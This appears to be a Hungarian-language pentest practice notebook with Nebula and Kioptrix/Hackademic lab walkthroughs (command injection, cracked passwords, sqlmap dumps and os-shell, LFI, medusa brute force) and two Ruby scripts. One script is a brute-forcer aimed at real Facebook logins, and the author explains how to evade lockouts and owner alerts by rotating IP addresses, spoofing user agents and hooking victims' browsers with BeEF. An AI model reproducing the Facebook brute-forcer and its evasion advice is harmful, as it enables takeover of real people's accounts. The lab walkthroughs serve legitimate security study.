Privilégium eszkaláció

Első lépés feldertés.
Who am I?
id
Where am I?
pwd
What is in there?
ls -al
Which system is this?
uname -a
cat /etc/*release*

----

Forrás:

http://insidetrust.blogspot.hu/2011/04/quick-guide-to-linux-privilege.html

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://www.rebootuser.com/?p=1623

https://www.netspi.com/blog/entryid/112/windows-privilege-escalation-part-1-local-administrator-privileges

Automated checkers:

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Feladványok:

http://exploit-exercises.com/nebula

level00

find / -perm -4000 -type f 2>/dev/null
/bin/.../flag00

level01

Itt nem egészen értettem, hogy mit kell csinálni így megnéztem egy megoldást - utána már egyszerűbb volt...

http://www.mattandreko.com/2011/12/02/exploit-exercises-nebula-01/

level02

cd /home/flag02
USER="a && /bin/bash && "
./flag02
geflag

level03

vi /home/level03/test
#!/bin/bash
getflag > /tmp/out

cp /home/level03/test writeable.d

... (wait 1 minute)
cat /tmp/out

level04

cd /home/flag04
ln -s /home/flag04/token /home/level04/t
./flag04 /home/level04/t
06508b5e-8909-4f38-b630-fdb148a848a2

level05

cd /home/flag05
ls -al
ls -al .backup
cp .backup/b* /home/level05
cd /home/level05
tar xvzf backup-19072011.tgz
ssh flag05@192.168.56.101 -i .ssh/id_rsa
getflag

level06

ls -al /home/flag06
grep flag06 /etc/passwd

edit a.pas
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john a.pas
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 15687  trying: 123456 - marley

exit
nebula login:flag06
Password: hello
getflag

level07
cd /home/flag07
more thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_req=1 ttl=64 time=0.020 ms
64 bytes from 192.168.56.101: icmp_req=2 ttl=64 time=0.050 ms
64 bytes from 192.168.56.101: icmp_req=3 ttl=64 time=0.056 ms

--- 192.168.56.101 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.020/0.042/0.056/0.015 ms

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20ls%20-al

total 10
drwxr-x--- 2 flag07 level07  102 Nov 20  2011 .
drwxr-xr-x 1 root   root     260 Aug 27  2012 ..
-rw-r--r-- 1 flag07 flag07   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag07 flag07  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag07 flag07   675 May 18  2011 .profile
-rwxr-xr-x 1 root   root     368 Nov 20  2011 index.cgi
-rw-r--r-- 1 root   root    3719 Nov 20  2011 thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20id

uid=992(flag07) gid=992(flag07) groups=992(flag07)

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20getflag

You have successfully executed getflag on a target account

level08

cd /home/flag08
ls -al
cp capture.pcap /home/level08
cd /home/level08
scp capture.pcap user@192.168.56.102:.

wireshark capture.pcap

Follow Tcp stream

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b.....B.
..............................1.......!.."......"......!..........."........".."................
.....................

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)


..wwwbugs login: l.le.ev.ve.el.l8.8
..

Password: backdoor...00Rm8.ate
.

..

Login incorrect

wwwbugs login:



backdoor...00Rm8.ate

000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

7f = delete

backd00Rmate

nebula login: flag08
Password: backd00Rmate

getflag

level09

Ez a feladat meghaladta a jelenlegi tudásomat :)

http://www.mattandreko.com/2011/12/10/exploit-exercises-nebula-09/

level10

ls -al
more .viminfo
strings x

Ez egy nehéz feladvány volt, de mivel két lépésben hozzájutottam a szükséges kódhoz nem fárasztottam vele magam (persze megnéztem, hogy mi a példa igazi megoldása, de végülis ha megy könnyebben, akkor nem vesződöm a nehezebb úttal.)

http://www.mattandreko.com/2011/12/11/exploit-exercises-nebula-10/

http://www.pedramhayati.com/2012/02/01/nebula-level10-solution/

level11

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level12

telnet 127.0.0.1 5001
| ls -al > /tmp/a

cat /tmp/a

telnet 127.0.0.1 5001
| getflag > /tmp/b

cat /tmp/b

level13

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level14

cd /home/flag14
cat token
./flag14
aaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrst

vi /home/level14/decode.pl

#!/usr/bin/perl

while (my $line = <STDIN>) {
 chomp($line);
 $len = length($line);
 for ($i = 0; $i < $len; $i++) {
  $y = substr($line,$i,1);
  $x = ord($y);
  print chr($x-$i);
  }
 }

cat token | perl /home/level14/decode.pl
8457c118-887c-4e40-a5a6-33a25353165

level15-level19

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

Ezekbe most nem volt kedvem belemenni. Meg különben is meghaladták a jelenlegi felkészültségi szintemet.
Jöhetnek a Privilege Escalation feladványok..... Most egy kicsit beleásom ebbe a részbe magam.

Facebook password tesztelő

Össze dobtam egy facebook jelszó tesztelő programot. Ez igazából csak egy POC (Proof of concept) mivel valódi jelszó törésre nem lehet használni. Ahhoz, hogy valódi jelszó feltőrésére is alkalmas legyen ki kell iktatni pár dolgot ami a facebook védelmi rendszerében van. Például, hogy ne jelezze a felhasználónak a belépési kísérleteket és hogy ne adjon fel 5 rossz próba után egy captcha-t.(Az előbbit a user-agent mező manipulálásával az utóbbit pedig az ip cím variálásával (proxy használata) el lehet érni. A program nincs túl spirázva: nem írja ki, hogy hogy kell használni, nincs helpje, nem figyelmeztet ha elhagyunk egy paramétert, stb.

Íme a program:

#
# Usage : test.rb facebook@e-mail password-file
#
#

require 'rubygems'
require 'mechanize'

a = Mechanize.new

#a.user_agent = ''
# ide lehet beirni a user agent mezőt
# ha ide beírunk valamit, akkor a user_agent_alias sort kommentbe kell tenni: #a.user_agent_alias ..

a.user_agent_alias = 'Windows Mozilla'
page = a.get("http://m.facebook.com")

form = a.page.forms.first

form.email = ARGV[0]

File.readlines(ARGV[1]).each do |c|
c.chomp!
form.pass = c

page = form.submit

form = page.forms.first

if (form.action =~ /login/checkpoint/)
  puts c + " - Helyes jelszo\n"
else
  puts c + " - Rossz jelszo\n"
end

end

Ilyen outputja van:

root@kali:~# ruby test2.rb testuser@yahoo.com passwords.txt
1 - Rossz jelszo
2 - Rossz jelszo
TestPass - Helyes jelszo

A passwords.txt tartalma
1
2
TestPass

(A testuser@yahoo.com és a TestPass nem valódi adatok ezekkel ne próbálkozzon senki :)

A facebook jelszó lekérdezésénél az a probléma, hogy ha elég sokszor sikerül rossz jelszóval próbálkozni akkor már a jóval sem fog beengedni ugyanarról az ip címről. Ezen valószínűleg az ip cím váltogatás segíthet, mivel ha ez nem lenne ip címhez kötve, akkor az összes felhasználót ki lehetne így tiltani... Vagyis, ha kitilt egy ip címről, akkor egy másikról még be kell, hogy engedjen. A dolog hátulütője, hogy ha sikerül eltalálni a jelszót, akkor a fiók tulajdonosát a legközelebbi belépésekor a rendszer értesíti, hogy egy idegen eszközről beléptek a fiókjába, illetve ezt e-mailben is elküldheti, ha ez a felhasználónak be van állítva. Az ip cím váltogatására rengeteg lehetőség kínálkozik: Internet kapcsolat megszakítása és újra kérése (új ip címet kap valószínűleg a gép) mobil internet használata és ott disconnect/connect, proxy szerverek használata, vpn szolgáltatások váltogatása, satöbbi.  A user-agent mező megszerzésére meg kézenfekvőnek látszik a BEEF használata. Ha sikerül meghookolni a browsert, akkor majdnem valószínű, hogy szimulálni lehet a felhasználó böngészőjét és így nem fog jelezni neki, ha eltaláljuk a jó jelszót, mert nem fog tudni különbséget tenni a két eszköz között.

Ezt az alap programot más rendszerek bejelentkezésénél is lehet használni a megfelelően módosítva. Mivel egy könyvben azt olvastam, hogy egy penteszternek legyne mindenből saját fejlesztésű eszköze, így ez most már kipipálva: web form jelszó tesztelésre van saját programom :) Ebben az a jó, hogy úgy tudom felparaméterezni ahogy szeretném és amire szükség van. A rubyt nagyon jól lehet kliens oldali böngésző debuggoló eszköznek használni.

password brute force in ruby (for Web for Pentester II)

Megírtam első password brute-forcelő programomat. (na jó ez azért nagy túlzás :) Az ihletet a pentester.lab Web for Pentester II. példái adták. Az Authentication 2-es példájánál volt egy feladat, hogy a válaszidőkből lehetett saccolni a jelsző betűire. Ha nagyobb volt a válaszidő, akkor a jelszót eltalálta az ember. Sebtében össze is dobtam egy kis pár soros programot ami végignézi az adott karaktert és kiírja a válaszidőket.

Íme a program:

require "net/http"
require "uri"

uri = URI.parse("http://vulnerable/authentication/example2")

http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)

# pass = 'p4s....'

for a in ('a'..'z')
        pass = "p4s" + a
        request.basic_auth("hacker", pass)
        start_time = Time.now
        response = http.request(request)
        elapsed_time = Time.now - start_time
        print elapsed_time, pass, "n"
end
for a in ('A'..'Z')
        pass = "p4s" + a
        request.basic_auth("hacker", pass)
        start_time = Time.now
        response = http.request(request)
        elapsed_time = Time.now - start_time
        print elapsed_time, pass, "n"
end
for a in (0..9)
        pass = "p4s" + a.to_s
        request.basic_auth("hacker", pass)
        start_time = Time.now
        response = http.request(request)
        elapsed_time = Time.now - start_time
        print elapsed_time, pass, "n"
end

Valami ilyesmi outputja van:

...
1.812997502p4o
1.811892732p4p
1.811012498p4q
1.810557802p4r
2.009527982p4s
1.810828329p4t
1.809841847p4u
1.811344716p4v
...

Ebből látszik, hogy a 'p'-t és a '4'-est már előzőleg megtaláltam és a következő betű a jelszóban az 's'
(nyilván a jelszó p4ssw0rd lesz, de ha nem az lenne ezzel a módszerrel akkor is ki lehetne találni, ha véletlenszerű a kód... persze bele kéne tenni még a speciális karaktereket is...) Meg lehetne írni szépen is, hogy elindítom és magától megtalálja a kódot, de annyira még nem volt időm foglalkozni vele. Ha működik élesben is lehet, hogy megpróbálom összehozni. Bár nem nagyon hiszem, hogy éles helyzetben is ilyen eredményt adna, de ki lehet próbálni...Esetleg, ha valahol lehet következtetni a válaszidőkből valamire ott fel lehet használni ezt az elvet...

Mindenesetre megírtam életem első ruby kódját :)

Kioptrix 4

root@kali:~# netdiscover

 Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts                                                              

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                 
192.168.56.100  08:00:27:23:30:51    01    060   CADMUS COMPUTER SYSTEMS                                                         
 192.168.56.103  08:00:27:e0:cd:64    01    060   CADMUS COMPUTER SYSTEMS                                                         
          
root@kali:~# unicornscan 192.168.56.103
TCP open                http[   80]        from 192.168.56.103  ttl 64

root@kali:~# nikto -host 192.168.56.103
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2013-11-19 14:22:55 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2013-11-19 14:23:06 (GMT1) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.103/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Tue Nov 19 14:23:42 2013
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:329)                                                                              
                         
==> DIRECTORY: http://192.168.56.103/images/                                                                                      
                         
+ http://192.168.56.103/index (CODE:200|SIZE:1255)                                                                                
                         
+ http://192.168.56.103/index.php (CODE:200|SIZE:1255)                                                                            
                         
==> DIRECTORY: http://192.168.56.103/john/                                                                                        
                         
+ http://192.168.56.103/logout (CODE:302|SIZE:0)                                                                                  
                         
+ http://192.168.56.103/member (CODE:302|SIZE:220)                                                                                
                         
+ http://192.168.56.103/server-status (CODE:403|SIZE:334)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                              
-----------------
DOWNLOADED: 4592 - FOUND: 6

Mantra http://192.168.56.103/

Login

Load url
http://192.168.56.103/checklogin.php

Enable Post data
myusername=admin&mypassword='pass&Submit=Login
execute

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

root@kali:~# sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login"

--dbs

available databases [3]:
[*] information_schema
[*] members
[*] mysql

...

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D members -T members -C id,password,username --dump

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+


http://192.168.56.103/john/

http://192.168.56.103/robert/

http://192.168.56.103/john/john.php
http://192.168.56.103/robert/robert.php

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D mysql -T user -C Host,User,Password --dump

+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| 127.0.0.1 | root             |                                    |
| Kioptrix4 |           |                                    |
| Kioptrix4 | root             |                                    |
| localhost |           |                                    |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| localhost | root             | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+




--os-shell

os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
---

os-shell> cat /etc/group
...
admin:x:115:loneferret
...

os-shell> ls /var/www
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbjbbq.php
tmpbtahr.php
tmpueovq.php
tmpuxztg.php

os-shell> cat /var/www/login_success.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
    header("location:index.php");
}else{
    $id=$_GET['username'];
     header("location:member.php?username=$id");
}
?>

os-shell> cat /var/www/member.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:index.php");
}

$page = $_GET['username'];

//$page = preg_replace('/etc/','',$page,1) . ".php";
$page = preg_replace('/etc/','',$page,1);

if(file_exists($page)){
    $memPage = $page . "/" . $page . ".php";
    include($memPage);
}else{
    print ("User " .$page.'<br><br>');
    print("Oups, something went wrong with your member's page account.<br>Please contact your local Administrator<br> to fix

the issue.");
    print ('<br>');
    print('<form method="link" action="index.php"><input type=submit value="Back"></form>');
}
?>
---
...
http://192.168.56.102/member.php?username=/etc/etc/passwd% 0 0

This is an LFI

os-shell> netstat -nap | grep tcp
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4375/sh        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -              
tcp        0      0 192.168.56.103:80       192.168.56.101:43597    ESTABLISHED 4375/sh        
---

root@kali:/var/www/phpshells# nmap -sS 192.168.56.103

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-19 15:26 CET
Nmap scan report for 192.168.56.103
Host is up (0.00025s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E0:CD:64 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

root@kali:/var/www/phpshells# ssh john@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (RSA) to the list of known hosts.
john@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ john:~$ pwd
*** unknown command: pwd
john:~$ ls
john:~$ id
*** unknown command: id
john:~$ ls
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.


os-shell> ls -al /home/john
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 28
drwxr-xr-x 2 john john 4096 Feb  4  2012 .
drwxr-xr-x 5 root root 4096 Feb  4  2012 ..
-rw------- 1 john john   61 Feb  4  2012 .bash_history
-rw-r--r-- 1 john john  220 Feb  4  2012 .bash_logout
-rw-r--r-- 1 john john 2940 Feb  4  2012 .bashrc
-rw-r--r-- 1 john john  118 Feb  4  2012 .lhistory
-rw-r--r-- 1 john john  586 Feb  4  2012 .profile

os-shell> cat /home/john/.profile
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

john:~$
john:~$ echo $PATH
*** forbidden path -> "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
*** Kicked out
Connection to 192.168.56.103 closed.

root@kali:/var/www/phpshells# ssh robert@192.168.56.103
robert@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls


robert:~$ lpath
Allowed:
 /home/robert


That's all. I have not found the solution. My current goal was to identify the vulnerabilities. Currently, my knowledge is not enough to privilege escalation.

Hackademic RTB2 (to php-shell)

root@kali:~# netdiscover

 Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.100  08:00:27:4d:e2:d8    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.105  00:0c:29:74:b5:21    01    060   VMware, Inc.                                                                                              

root@kali:~# unicornscan 192.168.56.105
TCP open                http[   80]        from 192.168.56.105  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.105 -pT:80

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 08:56 CET
Nmap scan report for 192.168.56.105
Host is up (0.00039s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
root@kali:~# nikto -host 192.168.56.105
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2013-11-13 08:57:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 413560, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2013-11-13 08:57:33 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.105/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Nov 13 08:57:58 2013
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:290)                                                                                                        
+ http://192.168.56.105/check (CODE:200|SIZE:324)                                                                                                           
+ http://192.168.56.105/index (CODE:200|SIZE:1324)                                                                                                          
+ http://192.168.56.105/index.php (CODE:200|SIZE:1324)                                                                                                      
==> DIRECTORY: http://192.168.56.105/javascript/                                                                                                            
==> DIRECTORY: http://192.168.56.105/phpmyadmin/                                                                                                            
+ http://192.168.56.105/server-status (CODE:403|SIZE:295)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/ ----
==> DIRECTORY: http://192.168.56.105/javascript/jquery/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/ ----
+ http://192.168.56.105/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                                        
+ http://192.168.56.105/phpmyadmin/index.php (CODE:200|SIZE:8625)                                                                                           
==> DIRECTORY: http://192.168.56.105/phpmyadmin/js/                                                                                                         
==> DIRECTORY: http://192.168.56.105/phpmyadmin/lang/                                                                                                       
+ http://192.168.56.105/phpmyadmin/libraries (CODE:403|SIZE:302)                                                                                            
+ http://192.168.56.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                            
+ http://192.168.56.105/phpmyadmin/setup (CODE:401|SIZE:481)                                                                                                
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/jquery/ ----
+ http://192.168.56.105/javascript/jquery/jquery (CODE:200|SIZE:120763)                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/js/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/lang/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/                                                                                            
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/css/                                                                                        
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/img/                                                                                        
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/css/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/img/ ----
                                                                                                                                                            
-----------------
DOWNLOADED: 45920 - FOUND: 11

Iceweasel http://192.168.56.105/
http://192.168.56.105/phpmyadmin/

Mantra http://192.168.56.105/
Check
Enable post data

sqlmap -u "http://192.168.56.105/check.php" --data="username=admin&password=pass&Submit=Check%21" --level=5 --risk=5
[CRITICAL] all tested parameters appear to be not injectable.

http://192.168.56.105/phpmyadmin/Documentation.html?phpMyAdmin=1thocdud4fe6g9a8or6i6as7qaf5ee7a
phpMyAdmin 3.3.2 Documentation

root@kali:~# searchsploit phpmyadmin | grep "3.3"
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection         /php/webapps/18371.rb

msfconsole
msf > search phpmyadmin
Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/multi/http/phpmyadmin_3522_backdoor  2012-09-25       normal     phpMyAdmin 3.5.2.2 server_sync.php Backdoor
   exploit/multi/http/phpmyadmin_preg_replace   2013-04-25       excellent  phpMyAdmin Authenticated Remote Code Execution via preg_replace()
   exploit/unix/webapp/phpmyadmin_config        2009-03-24       excellent  PhpMyAdmin Config File Code Injection


http://192.168.56.105/phpmyadmin/setup
A username and password are being requested by http://192.168.56.105. The site says: "phpMyAdmin Setup"

http user authentication.

medusa -h 192.168.56.105 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: kadence (16690 of 14344391 complete)
GENERAL: Unable to connect: unreachable destination
